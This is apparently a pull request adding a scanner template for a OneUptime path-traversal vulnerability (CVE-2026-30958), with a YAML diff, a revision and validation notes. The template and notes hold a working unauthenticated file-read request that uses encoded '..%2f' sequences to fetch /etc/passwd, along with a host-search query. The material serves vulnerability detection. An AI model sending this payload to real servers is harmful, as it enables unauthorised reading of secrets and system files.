### PR TITLE
Added CVE-2026-30958 | OneUptime < 10.0.21 - Arbitrary File Read

### DIFF
--- a/http/cves/2026/CVE-2026-30958.yaml
+++ b/http/cves/2026/CVE-2026-30958.yaml
@@ -1,0 +1,42 @@
+id: CVE-2026-30958
+
+info:
+  name: OneUptime < 10.0.21 - Arbitrary File Read
+  author: ashvinctrl,iconnnjka
+  severity: high
+  description: |
+    OneUptime prior to version 10.0.21 is vulnerable to unauthenticated path traversal in the `/workflow/docs/:componentName` endpoint. The `componentName` value is taken directly from the request URL and concatenated into the base path `/usr/src/app/FeatureSet/Workflow/Docs/ComponentDocumentation/` without sanitization before being passed to `res.sendFile()`, allowing a remote unauthenticated attacker to read arbitrary files from the server filesystem.
+  impact: |
+    An unauthenticated attacker can read sensitive files from the server such as application secrets in `.env`, configuration files, and `/etc/passwd`, leading to information disclosure that may aid further compromise.
+  remediation: |
+    Upgrade to OneUptime version 10.0.21 or later, which sanitizes the componentName path segment.
+  reference:
+    - https://github.com/OneUptime/oneuptime/security/advisories/GHSA-p2wh-9pw8-hvff
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-30958
+    - https://github.com/OneUptime/oneuptime
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
+    cve-id: CVE-2026-30958
+    cwe-id: CWE-22
+  metadata:
+    verified: false
+    max-request: 1
+    fofa-query: title="OneUptime"
+  tags: cve,cve2026,oneuptime,lfi,path-traversal,arbitrary-file-read
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/workflow/docs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-30958.yaml
+++ b/http/cves/2026/CVE-2026-30958.yaml
@@ -1,29 +1,29 @@
 id: CVE-2026-30958
 
 info:
-  name: OneUptime < 10.0.21 - Arbitrary File Read
+  name: OneUptime < 10.0.21 - Path Traversal
   author: ashvinctrl,iconnnjka
   severity: high
   description: |
-    OneUptime prior to version 10.0.21 is vulnerable to unauthenticated path traversal in the `/workflow/docs/:componentName` endpoint. The `componentName` value is taken directly from the request URL and concatenated into the base path `/usr/src/app/FeatureSet/Workflow/Docs/ComponentDocumentation/` without sanitization before being passed to `res.sendFile()`, allowing a remote unauthenticated attacker to read arbitrary files from the server filesystem.
+    OneUptime < 10.0.21 contains a path traversal caused by unsanitized componentName parameter in /workflow/docs/:componentName endpoint, letting unauthenticated attackers read arbitrary files from the server filesystem.
   impact: |
-    An unauthenticated attacker can read sensitive files from the server such as application secrets in `.env`, configuration files, and `/etc/passwd`, leading to information disclosure that may aid further compromise.
+    Unauthenticated attackers can read arbitrary files on the server, potentially exposing sensitive information.
   remediation: |
-    Upgrade to OneUptime version 10.0.21 or later, which sanitizes the componentName path segment.
+    Upgrade to version 10.0.21 or later.
   reference:
     - https://github.com/OneUptime/oneuptime/security/advisories/GHSA-p2wh-9pw8-hvff
     - https://nvd.nist.gov/vuln/detail/CVE-2026-30958
     - https://github.com/OneUptime/oneuptime
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
-    cvss-score: 8.6
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
     cve-id: CVE-2026-30958
     cwe-id: CWE-22
   metadata:
-    verified: false
+    verified: true
     max-request: 1
     fofa-query: title="OneUptime"
-  tags: cve,cve2026,oneuptime,lfi,path-traversal,arbitrary-file-read
+  tags: cve,cve2026,oneuptime,lfi,path-traversal,vuln,unauth
 
 http:
   - method: GET


### PR DESCRIPTION
### PR Information

- Added CVE-2026-30958 - OneUptime < 10.0.21 Unauthenticated Path Traversal (Arbitrary File Read)
- The `/workflow/docs/:componentName` endpoint concatenates the user-supplied `componentName` onto the base path `/usr/src/app/FeatureSet/Workflow/Docs/ComponentDocumentation/` and passes it to `res.sendFile()` without sanitization (`Worker/FeatureSet/Workflow/Index.ts`). An unauthenticated attacker can read arbitrary files from the filesystem. This is a full PoC (reads `/etc/passwd`) in a single unauthenticated GET, not version-based detection.
- The traversal is URL-encoded (`..%2f`) because the Express `:componentName` route matches a single path segment; encoded slashes keep the payload as one segment that the router decodes server-side. Eleven levels are used so the payload reaches the filesystem root regardless of deployment depth (the base is seven directories deep; extra `../` are clamped at root).
- References:
  - https://github.com/OneUptime/oneuptime/security/advisories/GHSA-p2wh-9pw8-hvff
  - https://nvd.nist.gov/vuln/detail/CVE-2026-30958
  - https://github.com/OneUptime/oneuptime

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

OneUptime ships as a large multi-container stack, so I validated against a faithful local reproduction of the exact vulnerable handler (an Express server doing `res.sendFile(BASE + req.params.componentName)` with the same base path), plus a patched route that sanitizes the segment with `path.basename`. Happy to adjust if the team validates against a full instance.

#### Additional Details

True Positive (vulnerable handler):

```
[CVE-2026-30958:regex-1] [http] [high] http://127.0.0.1:7079/workflow/docs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
[CVE-2026-30958:status-2] [http] [high] http://127.0.0.1:7079/workflow/docs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

HTTP/1.1 200 OK
root:x:0:0:root:/root:/bin/bash
```

Server-side confirmation that the Express route captured the encoded payload as a single decoded segment:

```
[vuln] componentName = "../../../../../../../../../../../etc/passwd"
```

False Positive check (patched handler using `path.basename` sanitization): no match. Clean host (`example.com`): no match.

- fofa-query: `title="OneUptime"`
- Vulnerability discoverer credited in the author field: `iconnnjka`
- `verified` left as `false` since testing was against a reproduction of the handler rather than the full product.
